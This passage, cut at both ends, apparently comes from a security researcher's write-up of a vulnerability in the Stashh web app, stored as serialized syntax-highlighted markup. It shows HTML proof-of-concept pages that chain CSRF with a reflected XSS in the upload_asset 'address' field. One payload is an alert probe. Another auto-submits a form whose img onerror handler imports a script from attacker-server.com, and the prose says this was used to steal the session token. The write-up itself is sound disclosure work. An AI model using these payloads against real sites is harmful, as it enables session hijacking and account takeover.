'/')",{"type":28,"tag":116,"props":32070,"children":32071},{"style":488},[32072],{"type":33,"value":603},{"type":28,"tag":116,"props":32074,"children":32075},{"style":376},[32076],{"type":33,"value":789},{"type":28,"tag":116,"props":32078,"children":32079},{"style":488},[32080],{"type":33,"value":506},{"type":28,"tag":116,"props":32082,"children":32083},{"class":245,"line":361},[32084,32088,32093,32097,32101,32106,32111,32115,32120,32124,32128,32133,32138,32142,32147,32152,32156,32161],{"type":28,"tag":116,"props":32085,"children":32086},{"style":488},[32087],{"type":33,"value":546},{"type":28,"tag":116,"props":32089,"children":32090},{"style":376},[32091],{"type":33,"value":32092},"form",{"type":28,"tag":116,"props":32094,"children":32095},{"style":272},[32096],{"type":33,"value":680},{"type":28,"tag":116,"props":32098,"children":32099},{"style":370},[32100],{"type":33,"value":373},{"type":28,"tag":116,"props":32102,"children":32103},{"style":563},[32104],{"type":33,"value":32105},"\"form123\"",{"type":28,"tag":116,"props":32107,"children":32108},{"style":272},[32109],{"type":33,"value":32110}," action",{"type":28,"tag":116,"props":32112,"children":32113},{"style":370},[32114],{"type":33,"value":373},{"type":28,"tag":116,"props":32116,"children":32117},{"style":563},[32118],{"type":33,"value":32119},"\"https://stashh.io/upload_asset\"",{"type":28,"tag":116,"props":32121,"children":32122},{"style":272},[32123],{"type":33,"value":16771},{"type":28,"tag":116,"props":32125,"children":32126},{"style":370},[32127],{"type":33,"value":373},{"type":28,"tag":116,"props":32129,"children":32130},{"style":563},[32131],{"type":33,"value":32132},"\"POST\"",{"type":28,"tag":116,"props":32134,"children":32135},{"style":272},[32136],{"type":33,"value":32137}," enctype",{"type":28,"tag":116,"props":32139,"children":32140},{"style":370},[32141],{"type":33,"value":373},{"type":28,"tag":116,"props":32143,"children":32144},{"style":563},[32145],{"type":33,"value":32146},"\"multipart/form-data\"",{"type":28,"tag":116,"props":32148,"children":32149},{"style":272},[32150],{"type":33,"value":32151}," value",{"type":28,"tag":116,"props":32153,"children":32154},{"style":370},[32155],{"type":33,"value":373},{"type":28,"tag":116,"props":32157,"children":32158},{"style":563},[32159],{"type":33,"value":32160},"\"asd\"",{"type":28,"tag":116,"props":32162,"children":32163},{"style":488},[32164],{"type":33,"value":506},{"type":28,"tag":116,"props":32166,"children":32167},{"class":245,"line":387},[32168,32173,32177,32182,32186,32191,32196,32200,32205,32209,32213,32218],{"type":28,"tag":116,"props":32169,"children":32170},{"style":488},[32171],{"type":33,"value":32172},"     \u003C",{"type":28,"tag":116,"props":32174,"children":32175},{"style":376},[32176],{"type":33,"value":8039},{"type":28,"tag":116,"props":32178,"children":32179},{"style":272},[32180],{"type":33,"value":32181}," type",{"type":28,"tag":116,"props":32183,"children":32184},{"style":370},[32185],{"type":33,"value":373},{"type":28,"tag":116,"props":32187,"children":32188},{"style":563},[32189],{"type":33,"value":32190},"\"file\"",{"type":28,"tag":116,"props":32192,"children":32193},{"style":272},[32194],{"type":33,"value":32195}," name",{"type":28,"tag":116,"props":32197,"children":32198},{"style":370},[32199],{"type":33,"value":373},{"type":28,"tag":116,"props":32201,"children":32202},{"style":563},[32203],{"type":33,"value":32204},"\"data\"",{"type":28,"tag":116,"props":32206,"children":32207},{"style":272},[32208],{"type":33,"value":680},{"type":28,"tag":116,"props":32210,"children":32211},{"style":370},[32212],{"type":33,"value":373},{"type":28,"tag":116,"props":32214,"children":32215},{"style":563},[32216],{"type":33,"value":32217},"\"file123\"",{"type":28,"tag":116,"props":32219,"children":32220},{"style":488},[32221],{"type":33,"value":506},{"type":28,"tag":116,"props":32223,"children":32224},{"class":245,"line":400},[32225,32230,32234,32238,32242,32247,32251,32255,32260,32264,32268,32272,32277,32282,32287,32292,32297,32301,32306,32310,32315,32319,32324,32328,32332,32337,32342,32346,32351,32356,32361,32366,32370,32375,32380,32385,32390,32395,32399,32404,32409,32413],{"type":28,"tag":116,"props":32226,"children":32227},{"style":488},[32228],{"type":33,"value":32229},"      \u003C",{"type":28,"tag":116,"props":32231,"children":32232},{"style":376},[32233],{"type":33,"value":8039},{"type":28,"tag":116,"props":32235,"children":32236},{"style":272},[32237],{"type":33,"value":32181},{"type":28,"tag":116,"props":32239,"children":32240},{"style":370},[32241],{"type":33,"value":373},{"type":28,"tag":116,"props":32243,"children":32244},{"style":563},[32245],{"type":33,"value":32246},"\"hidden\"",{"type":28,"tag":116,"props":32248,"children":32249},{"style":272},[32250],{"type":33,"value":32195},{"type":28,"tag":116,"props":32252,"children":32253},{"style":370},[32254],{"type":33,"value":373},{"type":28,"tag":116,"props":32256,"children":32257},{"style":563},[32258],{"type":33,"value":32259},"\"config\"",{"type":28,"tag":116,"props":32261,"children":32262},{"style":272},[32263],{"type":33,"value":32151},{"type":28,"tag":116,"props":32265,"children":32266},{"style":370},[32267],{"type":33,"value":373},{"type":28,"tag":116,"props":32269,"children":32270},{"style":563},[32271],{"type":33,"value":2240},{"type":28,"tag":116,"props":32273,"children":32274},{"style":376},[32275],{"type":33,"value":32276},"{"",{"type":28,"tag":116,"props":32278,"children":32279},{"style":563},[32280],{"type":33,"value":32281},"address",{"type":28,"tag":116,"props":32283,"children":32284},{"style":376},[32285],{"type":33,"value":32286},"":"",{"type":28,"tag":116,"props":32288,"children":32289},{"style":563},[32290],{"type":33,"value":32291},"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq",{"type":28,"tag":116,"props":32293,"children":32294},{"style":376},[32295],{"type":33,"value":32296},"<",{"type":28,"tag":116,"props":32298,"children":32299},{"style":563},[32300],{"type":33,"value":206},{"type":28,"tag":116,"props":32302,"children":32303},{"style":376},[32304],{"type":33,"value":32305},"/",{"type":28,"tag":116,"props":32307,"children":32308},{"style":563},[32309],{"type":33,"value":1635},{"type":28,"tag":116,"props":32311,"children":32312},{"style":376},[32313],{"type":33,"value":32314},"=",{"type":28,"tag":116,"props":32316,"children":32317},{"style":563},[32318],{"type":33,"value":18939},{"type":28,"tag":116,"props":32320,"children":32321},{"style":376},[32322],{"type":33,"value":32323}," ",{"type":28,"tag":116,"props":32325,"children":32326},{"style":563},[32327],{"type":33,"value":921},{"type":28,"tag":116,"props":32329,"children":32330},{"style":376},[32331],{"type":33,"value":32314},{"type":28,"tag":116,"props":32333,"children":32334},{"style":563},[32335],{"type":33,"value":32336},"alert",{"type":28,"tag":116,"props":32338,"children":32339},{"style":376},[32340],{"type":33,"value":32341},"(",{"type":28,"tag":116,"props":32343,"children":32344},{"style":563},[32345],{"type":33,"value":1156},{"type":28,"tag":116,"props":32347,"children":32348},{"style":376},[32349],{"type":33,"value":32350},".",{"type":28,"tag":116,"props":32352,"children":32353},{"style":563},[32354],{"type":33,"value":32355},"domain",{"type":28,"tag":116,"props":32357,"children":32358},{"style":376},[32359],{"type":33,"value":32360},")>","",{"type":28,"tag":116,"props":32362,"children":32363},{"style":563},[32364],{"type":33,"value":32365},"to",{"type":28,"tag":116,"props":32367,"children":32368},{"style":376},[32369],{"type":33,"value":32286},{"type":28,"tag":116,"props":32371,"children":32372},{"style":563},[32373],{"type":33,"value":32374},"profile",{"type":28,"tag":116,"props":32376,"children":32377},{"style":376},[32378],{"type":33,"value":32379},"-",{"type":28,"tag":116,"props":32381,"children":32382},{"style":563},[32383],{"type":33,"value":32384},"assets",{"type":28,"tag":116,"props":32386,"children":32387},{"style":376},[32388],{"type":33,"value":32389},"","",{"type":28,"tag":116,"props":32391,"children":32392},{"style":563},[32393],{"type":33,"value":32394},"type",{"type":28,"tag":116,"props":32396,"children":32397},{"style":376},[32398],{"type":33,"value":32286},{"type":28,"tag":116,"props":32400,"children":32401},{"style":563},[32402],{"type":33,"value":32403},"icon",{"type":28,"tag":116,"props":32405,"children":32406},{"style":376},[32407],{"type":33,"value":32408},""}",{"type":28,"tag":116,"props":32410,"children":32411},{"style":563},[32412],{"type":33,"value":2240},{"type":28,"tag":116,"props":32414,"children":32415},{"style":488},[32416],{"type":33,"value":32417}," />\n",{"type":28,"tag":116,"props":32419,"children":32420},{"class":245,"line":614},[32421,32425,32429,32433,32437,32442,32446,32450,32455],{"type":28,"tag":116,"props":32422,"children":32423},{"style":488},[32424],{"type":33,"value":32229},{"type":28,"tag":116,"props":32426,"children":32427},{"style":376},[32428],{"type":33,"value":8039},{"type":28,"tag":116,"props":32430,"children":32431},{"style":272},[32432],{"type":33,"value":32181},{"type":28,"tag":116,"props":32434,"children":32435},{"style":370},[32436],{"type":33,"value":373},{"type":28,"tag":116,"props":32438,"children":32439},{"style":563},[32440],{"type":33,"value":32441},"\"submit\"",{"type":28,"tag":116,"props":32443,"children":32444},{"style":272},[32445],{"type":33,"value":32151},{"type":28,"tag":116,"props":32447,"children":32448},{"style":370},[32449],{"type":33,"value":373},{"type":28,"tag":116,"props":32451,"children":32452},{"style":563},[32453],{"type":33,"value":32454},"\"Submit request\"",{"type":28,"tag":116,"props":32456,"children":32457},{"style":488},[32458],{"type":33,"value":32417},{"type":28,"tag":116,"props":32460,"children":32461},{"class":245,"line":631},[32462,32466,32470],{"type":28,"tag":116,"props":32463,"children":32464},{"style":488},[32465],{"type":33,"value":1976},{"type":28,"tag":116,"props":32467,"children":32468},{"style":376},[32469],{"type":33,"value":32092},{"type":28,"tag":116,"props":32471,"children":32472},{"style":488},[32473],{"type":33,"value":506},{"type":28,"tag":116,"props":32475,"children":32476},{"class":245,"line":665},[32477,32482,32486],{"type":28,"tag":116,"props":32478,"children":32479},{"style":488},[32480],{"type":33,"value":32481},"  \u003C/",{"type":28,"tag":116,"props":32483,"children":32484},{"style":376},[32485],{"type":33,"value":624},{"type":28,"tag":116,"props":32487,"children":32488},{"style":488},[32489],{"type":33,"value":506},{"type":28,"tag":116,"props":32491,"children":32492},{"class":245,"line":713},[32493],{"type":28,"tag":116,"props":32494,"children":32495},{"emptyLinePlaceholder":19},[32496],{"type":33,"value":1044},{"type":28,"tag":116,"props":32498,"children":32499},{"class":245,"line":750},[32500,32504,32508],{"type":28,"tag":116,"props":32501,"children":32502},{"style":488},[32503],{"type":33,"value":32040},{"type":28,"tag":116,"props":32505,"children":32506},{"style":376},[32507],{"type":33,"value":789},{"type":28,"tag":116,"props":32509,"children":32510},{"style":488},[32511],{"type":33,"value":506},{"type":28,"tag":116,"props":32513,"children":32514},{"class":245,"line":779},[32515],{"type":28,"tag":116,"props":32516,"children":32517},{"emptyLinePlaceholder":19},[32518],{"type":33,"value":1044},{"type":28,"tag":116,"props":32520,"children":32521},{"class":245,"line":796},[32522,32527],{"type":28,"tag":116,"props":32523,"children":32524},{"style":266},[32525],{"type":33,"value":32526},"    (async ()=>",{"type":28,"tag":116,"props":32528,"children":32529},{"style":376},[32530],{"type":33,"value":10547},{"type":28,"tag":116,"props":32532,"children":32533},{"class":245,"line":847},[32534,32539,32544,32548,32552,32556,32560,32565,32569,32574,32579,32583],{"type":28,"tag":116,"props":32535,"children":32536},{"style":272},[32537],{"type":33,"value":32538},"        const",{"type":28,"tag":116,"props":32540,"children":32541},{"style":272},[32542],{"type":33,"value":32543}," blob",{"type":28,"tag":116,"props":32545,"children":32546},{"style":370},[32547],{"type":33,"value":926},{"type":28,"tag":116,"props":32549,"children":32550},{"style":260},[32551],{"type":33,"value":1091},{"type":28,"tag":116,"props":32553,"children":32554},{"style":370},[32555],{"type":33,"value":269},{"type":28,"tag":116,"props":32557,"children":32558},{"style":260},[32559],{"type":33,"value":1091},{"type":28,"tag":116,"props":32561,"children":32562},{"style":282},[32563],{"type":33,"value":32564}," fetch",{"type":28,"tag":116,"props":32566,"children":32567},{"style":370},[32568],{"type":33,"value":313},{"type":28,"tag":116,"props":32570,"children":32571},{"style":563},[32572],{"type":33,"value":32573},"\"/sapo.png\"",{"type":28,"tag":116,"props":32575,"children":32576},{"style":370},[32577],{"type":33,"value":32578},")).",{"type":28,"tag":116,"props":32580,"children":32581},{"style":282},[32582],{"type":33,"value":1604},{"type":28,"tag":116,"props":32584,"children":32585},{"style":370},[32586],{"type":33,"value":7407},{"type":28,"tag":116,"props":32588,"children":32589},{"class":245,"line":898},[32590],{"type":28,"tag":116,"props":32591,"children":32592},{"emptyLinePlaceholder":19},[32593],{"type":33,"value":1044},{"type":28,"tag":116,"props":32595,"children":32596},{"class":245,"line":907},[32597,32601,32606,32610,32614,32619,32624,32628,32632,32637,32642,32647,32652],{"type":28,"tag":116,"props":32598,"children":32599},{"style":272},[32600],{"type":33,"value":2736},{"type":28,"tag":116,"props":32602,"children":32603},{"style":272},[32604],{"type":33,"value":32605}," f",{"type":28,"tag":116,"props":32607,"children":32608},{"style":370},[32609],{"type":33,"value":926},{"type":28,"tag":116,"props":32611,"children":32612},{"style":376},[32613],{"type":33,"value":336},{"type":28,"tag":116,"props":32615,"children":32616},{"style":282},[32617],{"type":33,"value":32618}," File",{"type":28,"tag":116,"props":32620,"children":32621},{"style":370},[32622],{"type":33,"value":32623},"([",{"type":28,"tag":116,"props":32625,"children":32626},{"style":272},[32627],{"type":33,"value":1604},{"type":28,"tag":116,"props":32629,"children":32630},{"style":370},[32631],{"type":33,"value":22723},{"type":28,"tag":116,"props":32633,"children":32634},{"style":563},[32635],{"type":33,"value":32636},"'sapo.png'",{"type":28,"tag":116,"props":32638,"children":32639},{"style":370},[32640],{"type":33,"value":32641},", {",{"type":28,"tag":116,"props":32643,"children":32644},{"style":272},[32645],{"type":33,"value":32646},"type:",{"type":28,"tag":116,"props":32648,"children":32649},{"style":563},[32650],{"type":33,"value":32651}," 'image/png'",{"type":28,"tag":116,"props":32653,"children":32654},{"style":370},[32655],{"type":33,"value":32656},"})\n",{"type":28,"tag":116,"props":32658,"children":32659},{"class":245,"line":981},[32660,32664,32669,32673,32677,32682],{"type":28,"tag":116,"props":32661,"children":32662},{"style":272},[32663],{"type":33,"value":32538},{"type":28,"tag":116,"props":32665,"children":32666},{"style":272},[32667],{"type":33,"value":32668}," dataTransfer",{"type":28,"tag":116,"props":32670,"children":32671},{"style":370},[32672],{"type":33,"value":926},{"type":28,"tag":116,"props":32674,"children":32675},{"style":376},[32676],{"type":33,"value":336},{"type":28,"tag":116,"props":32678,"children":32679},{"style":282},[32680],{"type":33,"value":32681}," DataTransfer",{"type":28,"tag":116,"props":32683,"children":32684},{"style":370},[32685],{"type":33,"value":1445},{"type":28,"tag":116,"props":32687,"children":32688},{"class":245,"line":1011},[32689,32694,32698,32703,32707,32711,32715,32720],{"type":28,"tag":116,"props":32690,"children":32691},{"style":272},[32692],{"type":33,"value":32693},"        dataTransfer",{"type":28,"tag":116,"props":32695,"children":32696},{"style":370},[32697],{"type":33,"value":141},{"type":28,"tag":116,"props":32699,"children":32700},{"style":272},[32701],{"type":33,"value":32702},"items",{"type":28,"tag":116,"props":32704,"children":32705},{"style":370},[32706],{"type":33,"value":141},{"type":28,"tag":116,"props":32708,"children":32709},{"style":282},[32710],{"type":33,"value":9306},{"type":28,"tag":116,"props":32712,"children":32713},{"style":370},[32714],{"type":33,"value":313},{"type":28,"tag":116,"props":32716,"children":32717},{"style":272},[32718],{"type":33,"value":32719},"f",{"type":28,"tag":116,"props":32721,"children":32722},{"style":370},[32723],{"type":33,"value":895},{"type":28,"tag":116,"props":32725,"children":32726},{"class":245,"line":1029},[32727],{"type":28,"tag":116,"props":32728,"children":32729},{"emptyLinePlaceholder":19},[32730],{"type":33,"value":1044},{"type":28,"tag":116,"props":32732,"children":32733},{"class":245,"line":1038},[32734,32739,32743,32748,32752,32757,32761,32765],{"type":28,"tag":116,"props":32735,"children":32736},{"style":272},[32737],{"type":33,"value":32738},"        file123",{"type":28,"tag":116,"props":32740,"children":32741},{"style":370},[32742],{"type":33,"value":141},{"type":28,"tag":116,"props":32744,"children":32745},{"style":272},[32746],{"type":33,"value":32747},"files",{"type":28,"tag":116,"props":32749,"children":32750},{"style":370},[32751],{"type":33,"value":926},{"type":28,"tag":116,"props":32753,"children":32754},{"style":272},[32755],{"type":33,"value":32756},"dataTransfer",{"type":28,"tag":116,"props":32758,"children":32759},{"style":370},[32760],{"type":33,"value":141},{"type":28,"tag":116,"props":32762,"children":32763},{"style":272},[32764],{"type":33,"value":32747},{"type":28,"tag":116,"props":32766,"children":32767},{"style":370},[32768],{"type":33,"value":384},{"type":28,"tag":116,"props":32770,"children":32771},{"class":245,"line":1047},[32772,32777],{"type":28,"tag":116,"props":32773,"children":32774},{"style":376},[32775],{"type":33,"value":32776},"    }",{"type":28,"tag":116,"props":32778,"children":32779},{"style":266},[32780],{"type":33,"value":32781},")()\n",{"type":28,"tag":116,"props":32783,"children":32784},{"class":245,"line":1071},[32785],{"type":28,"tag":116,"props":32786,"children":32787},{"emptyLinePlaceholder":19},[32788],{"type":33,"value":1044},{"type":28,"tag":116,"props":32790,"children":32791},{"class":245,"line":1137},[32792,32796,32800],{"type":28,"tag":116,"props":32793,"children":32794},{"style":488},[32795],{"type":33,"value":32481},{"type":28,"tag":116,"props":32797,"children":32798},{"style":376},[32799],{"type":33,"value":789},{"type":28,"tag":116,"props":32801,"children":32802},{"style":488},[32803],{"type":33,"value":506},{"type":28,"tag":116,"props":32805,"children":32806},{"class":245,"line":1181},[32807,32811,32815],{"type":28,"tag":116,"props":32808,"children":32809},{"style":488},[32810],{"type":33,"value":603},{"type":28,"tag":116,"props":32812,"children":32813},{"style":376},[32814],{"type":33,"value":478},{"type":28,"tag":116,"props":32816,"children":32817},{"style":488},[32818],{"type":33,"value":506},{"type":28,"tag":29,"props":32820,"children":32821},{},[32822],{"type":33,"value":32823},"When playing around with the application, we discovered that if an invalid address was submitted, the user's input would be reflected directly inside the response, another possible XSS vulnerability.",{"type":28,"tag":29,"props":32825,"children":32826},{},[32827],{"type":33,"value":32828},"However, since the request was a POST request, we initially thought this was only a self-XSS.",{"type":28,"tag":29,"props":32830,"children":32831},{},[32832],{"type":33,"value":32833},"In an effort to increase the impact of the above vulnerability, we discovered a way to leverage Cross-Site Request Forgery (CSRF) to manipulate the user's browser into sending a forced request that contained our XSS payload.",{"type":28,"tag":29,"props":32835,"children":32836},{},[32837],{"type":33,"value":32838},"From here, we were able to steal the session cookie from local storage.",{"type":28,"tag":234,"props":32840,"children":32842},{"className":31015,"code":32841,"language":31017,"meta":7,"style":7},"\u003Chtml>\n  \u003Cbody>\n  \u003Cscript>history.pushState('', '', '/')\u003C/script>\n    \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n     \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n      \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"<img/src=x onerror=import(`https://attacker-server.com/leak.js`)>","to":"profile-assets","type":"icon"}\" />\n      \u003Cinput type=\"submit\" value=\"Submit request\" />\n    \u003C/form>\n  \u003C/body>\n\n  \u003Cscript>\n\n    (async ()=>{\n        const blob = await (await fetch(\"/sapo.png\")).blob()\n\n        let f = new File([blob], 'sapo.png', {type: 'image/png'})\n        const dataTransfer = new DataTransfer();\n        dataTransfer.items.add(f);\n\n        file123.files = dataTransfer.files;\n\n        form123.submit()\n    })()\n\n  \u003C/script>\n\u003C/html>\n",[32843],{"type":28,"tag":98,"props":32844,"children":32845},{"__ignoreMap":7},[32846,32861,32876,32907,32982,33033,33221,33260,33275,33290,33297,33312,33319,33330,33381,33388,33443,33470,33505,33512,33547,33554,33575,33586,33593,33608],{"type":28,"tag":116,"props":32847,"children":32848},{"class":245,"line":246},[32849,32853,32857],{"type":28,"tag":116,"props":32850,"children":32851},{"style":488},[32852],{"type":33,"value":514},{"type":28,"tag":116,"props":32854,"children":32855},{"style":376},[32856],{"type":33,"value":478},{"type":28,"tag":116,"props":32858,"children":32859},{"style":488},[32860],{"type":33,"value":506},{"type":28,"tag":116,"props":32862,"children":32863},{"class":245,"line":256},[32864,32868,32872],{"type":28,"tag":116,"props":32865,"children":32866},{"style":488},[32867],{"type":33,"value":32040},{"type":28,"tag":116,"props":32869,"children":32870},{"style":376},[32871],{"type":33,"value":624},{"type":28,"tag":116,"props":32873,"children":32874},{"style":488},[32875],{"type":33,"value":506},{"type":28,"tag":116,"props":32877,"children":32878},{"class":245,"line":293},[32879,32883,32887,32891,32895,32899,32903],{"type":28,"tag":116,"props":32880,"children":32881},{"style":488},[32882],{"type":33,"value":32040},{"type":28,"tag":116,"props":32884,"children":32885},{"style":376},[32886],{"type":33,"value":789},{"type":28,"tag":116,"props":32888,"children":32889},{"style":488},[32890],{"type":33,"value":645},{"type":28,"tag":116,"props":32892,"children":32893},{"style":266},[32894],{"type":33,"value":32068},{"type":28,"tag":116,"props":32896,"children":32897},{"style":488},[32898],{"type":33,"value":603},{"type":28,"tag":116,"props":32900,"children":32901},{"style":376},[32902],{"type":33,"value":789},{"type":28,"tag":116,"props":32904,"children":32905},{"style":488},[32906],{"type":33,"value":506},{"type":28,"tag":116,"props":32908,"children":32909},{"class":245,"line":361},[32910,32914,32918,32922,32926,32930,32934,32938,32942,32946,32950,32954,32958,32962,32966,32970,32974,32978],{"type":28,"tag":116,"props":32911,"children":32912},{"style":488},[32913],{"type":33,"value":546},{"type":28,"tag":116,"props":32915,"children":32916},{"style":376},[32917],{"type":33,"value":32092},{"type":28,"tag":116,"props":32919,"children":32920},{"style":272},[32921],{"type":33,"value":680},{"type":28,"tag":116,"props":32923,"children":32924},{"style":370},[32925],{"type":33,"value":373},{"type":28,"tag":116,"props":32927,"children":32928},{"style":563},[32929],{"type":33,"value":32105},{"type":28,"tag":116,"props":32931,"children":32932},{"style":272},[32933],{"type":33,"value":32110},{"type":28,"tag":116,"props":32935,"children":32936},{"style":370},[32937],{"type":33,"value":373},{"type":28,"tag":116,"props":32939,"children":32940},{"style":563},[32941],{"type":33,"value":32119},{"type":28,"tag":116,"props":32943,"children":32944},{"style":272},[32945],{"type":33,"value":16771},{"type":28,"tag":116,"props":32947,"children":32948},{"style":370},[32949],{"type":33,"value":373},{"type":28,"tag":116,"props":32951,"children":32952},{"style":563},[32953],{"type":33,"value":32132},{"type":28,"tag":116,"props":32955,"children":32956},{"style":272},[32957],{"type":33,"value":32137},{"type":28,"tag":116,"props":32959,"children":32960},{"style":370},[32961],{"type":33,"value":373},{"type":28,"tag":116,"props":32963,"children":32964},{"style":563},[32965],{"type":33,"value":32146},{"type":28,"tag":116,"props":32967,"children":32968},{"style":272},[32969],{"type":33,"value":32151},{"type":28,"tag":116,"props":32971,"children":32972},{"style":370},[32973],{"type":33,"value":373},{"type":28,"tag":116,"props":32975,"children":32976},{"style":563},[32977],{"type":33,"value":32160},{"type":28,"tag":116,"props":32979,"children":32980},{"style":488},[32981],{"type":33,"value":506},{"type":28,"tag":116,"props":32983,"children":32984},{"class":245,"line":387},[32985,32989,32993,32997,33001,33005,33009,33013,33017,33021,33025,33029],{"type":28,"tag":116,"props":32986,"children":32987},{"style":488},[32988],{"type":33,"value":32172},{"type":28,"tag":116,"props":32990,"children":32991},{"style":376},[32992],{"type":33,"value":8039},{"type":28,"tag":116,"props":32994,"children":32995},{"style":272},[32996],{"type":33,"value":32181},{"type":28,"tag":116,"props":32998,"children":32999},{"style":370},[33000],{"type":33,"value":373},{"type":28,"tag":116,"props":33002,"children":33003},{"style":563},[33004],{"type":33,"value":32190},{"type":28,"tag":116,"props":33006,"children":33007},{"style":272},[33008],{"type":33,"value":32195},{"type":28,"tag":116,"props":33010,"children":33011},{"style":370},[33012],{"type":33,"value":373},{"type":28,"tag":116,"props":33014,"children":33015},{"style":563},[33016],{"type":33,"value":32204},{"type":28,"tag":116,"props":33018,"children":33019},{"style":272},[33020],{"type":33,"value":680},{"type":28,"tag":116,"props":33022,"children":33023},{"style":370},[33024],{"type":33,"value":373},{"type":28,"tag":116,"props":33026,"children":33027},{"style":563},[33028],{"type":33,"value":32217},{"type":28,"tag":116,"props":33030,"children":33031},{"style":488},[33032],{"type":33,"value":506},{"type":28,"tag":116,"props":33034,"children":33035},{"class":245,"line":400},[33036,33040,33044,33048,33052,33056,33060,33064,33068,33072,33076,33080,33085,33089,33094,33098,33103,33107,33112,33117,33121,33125,33130,33135,33140,33145,33150,33155,33159,33164,33168,33172,33177,33181,33186,33191,33196,33200,33204,33208,33213,33217],{"type":28,"tag":116,"props":33037,"children":33038},{"style":488},[33039],{"type":33,"value":32229},{"type":28,"tag":116,"props":33041,"children":33042},{"style":376},[33043],{"type":33,"value":8039},{"type":28,"tag":116,"props":33045,"children":33046},{"style":272},[33047],{"type":33,"value":32181},{"type":28,"tag":116,"props":33049,"children":33050},{"style":370},[33051],{"type":33,"value":373},{"type":28,"tag":116,"props":33053,"children":33054},{"style":563},[33055],{"type":33,"value":32246},{"type":28,"tag":116,"props":33057,"children":33058},{"style":272},[33059],{"type":33,"value":32195},{"type":28,"tag":116,"props":33061,"children":33062},{"style":370},[33063],{"type":33,"value":373},{"type":28,"tag":116,"props":33065,"children":33066},{"style":563},[33067],{"type":33,"value":32259},{"type":28,"tag":116,"props":33069,"children":33070},{"style":272},[33071],{"type":33,"value":32151},{"type":28,"tag":116,"props":33073,"children":33074},{"style":370},[33075],{"type":33,"value":373},{"type":28,"tag":116,"props":33077,"children":33078},{"style":563},[33079],{"type":33,"value":2240},{"type":28,"tag":116,"props":33081,"children":33082},{"style":376},[33083],{"type":33,"value":33084},"{"",{"type":28,"tag":116,"props":33086,"children":33087},{"style":563},[33088],{"type":33,"value":32281},{"type":28,"tag":116,"props":33090,"children":33091},{"style":376},[33092],{"type":33,"value":33093},"":"<",{"type":28,"tag":116,"props":33095,"children":33096},{"style":563},[33097],{"type":33,"value":206},{"type":28,"tag":116,"props":33099,"children":33100},{"style":376},[33101],{"type":33,"value":33102},"/",{"type":28,"tag":116,"props":33104,"children":33105},{"style":563},[33106],{"type":33,"value":1635},{"type":28,"tag":116,"props":33108,"children":33109},{"style":376},[33110],{"type":33,"value":33111},"=",{"type":28,"tag":116,"props":33113,"children":33114},{"style":563},[33115],{"type":33,"value":33116},"x onerror",{"type":28,"tag":116,"props":33118,"children":33119},{"style":376},[33120],{"type":33,"value":33111},{"type":28,"tag":116,"props":33122,"children":33123},{"style":563},[33124],{"type":33,"value":19147},{"type":28,"tag":116,"props":33126,"children":33127},{"style":376},[33128],{"type":33,"value":33129},"(`",{"type":28,"tag":116,"props":33131,"children":33132},{"style":563},[33133],{"type":33,"value":33134},"https",{"type":28,"tag":116,"props":33136,"children":33137},{"style":376},[33138],{"type":33,"value":33139},"://",{"type":28,"tag":116,"props":33141,"children":33142},{"style":563},[33143],{"type":33,"value":33144},"attacker-server",{"type":28,"tag":116,"props":33146,"children":33147},{"style":376},[33148],{"type":33,"value":33149},".",{"type":28,"tag":116,"props":33151,"children":33152},{"style":563},[33153],{"type":33,"value":33154},"com",{"type":28,"tag":116,"props":33156,"children":33157},{"style":376},[33158],{"type":33,"value":33102},{"type":28,"tag":116,"props":33160,"children":33161},{"style":563},[33162],{"type":33,"value":33163},"leak",{"type":28,"tag":116,"props":33165,"children":33166},{"style":376},[33167],{"type":33,"value":33149},{"type":28,"tag":116,"props":33169,"children":33170},{"style":563},[33171],{"type":33,"value":31017},{"type":28,"tag":116,"props":33173,"children":33174},{"style":376},[33175],{"type":33,"value":33176},"`)>","",{"type":28,"tag":116,"props":33178,"children":33179},{"style":563},[33180],{"type":33,"value":32365},{"type":28,"tag":116,"props":33182,"children":33183},{"style":376},[33184],{"type":33,"value":33185},"":"",{"type":28,"tag":116,"props":33187,"children":33188},{"style":563},[33189],{"type":33,"value":33190},"profile-assets",{"type":28,"tag":116,"props":33192,"children":33193},{"style":376},[33194],{"type":33,"value":33195},"","",{"type":28,"tag":116,"props":33197,"children":33198},{"style":563},[33199],{"type":33,"value":32394},{"type":28,"tag":116,"props":33201,"children":33202},{"style":376},[33203],{"type":33,"value":33185},{"type":28,"tag":116,"props":33205,"children":33206},{"style":563},[33207],{"type":33,"value":32403},{"type":28,"tag":116,"props":33209,"children":33210},{"style":376},[33211],{"type":33,"value":33212},""}",{"type":28,"tag":116,"props":33214,"children":33215},{"style":563},[33216],{"type":33,"value":2240},{"type":28,"tag":116,"props":33218,"children":33219},{"style":488},[33220],{"type":33,"value":32417},{"type":28,"tag":116,"props":33222,"children":33223},{"class":245,"line":614},[33224,33228,33232,33236,33240,33244,33248,33252,33256],{"type":28,"tag":116,"props":33225,"children":33226},{"style":488},[33227],{"type":33,"value":32229},{"type":28,"tag":116,"props":33229,"children":33230},{"style":376},[33231],{"type":33,"value":8039},{"type":28,"tag":116,"props":33233,"children":33234},{"style":272},[33235],{"type":33,"value":32181},{"type":28,"tag":116,"props":33237,"children":33238},{"style":370},[33239],{"type":33,"value":373},{"type":28,"tag":116,"props":33241,"children":33242},{"style":563},[33243],{"type":33,"value":32441},{"type":28,"tag":116,"props":33245,"children":33246},{"style":272},[33247],{"type":33,"value":32151},{"type":28,"tag":116,"props":33249,"children":33250},{"style":370},[33251],{"type":33,"value":373},{"type":28,"tag":116,"props":33253,"children":33254},{"style":563},[33255],{"type":33,"value":32454},{"type":28,"tag":116,"props":33257,"children":33258},{"style":488},[33259],{"type":33,"value":32417},{"type":28,"tag":116,"props":33261,"children":33262},{"class":245,"line":631},[33263,33267,33271],{"type":28,"tag":116,"props":33264,"children":33265},{"style":488},[33266],{"type":33,"value":1976},{"type":28,"tag":116,"props":33268,"children":33269},{"style":376},[33270],{"type":33,"value":32092},{"type":28,"tag":116,"props":33272,"children":33273},{"style":488},[33274],{"type":33,"value":506},{"type":28,"tag":116,"props":33276,"children":33277},{"class":245,"line":665},[33278,33282,33286],{"type":28,"tag":116,"props":33279,"children":33280},{"style":488},[33281],{"type":33,"value":32481},{"type":28,"tag":116,"props":33283,"children":33284},{"style":376},[33285],{"type":33,"value":624},{"type":28,"tag":116,"props":33287,"children":33288},{"style":488},[33289],{"type":33,"value":506},{"type":28,"t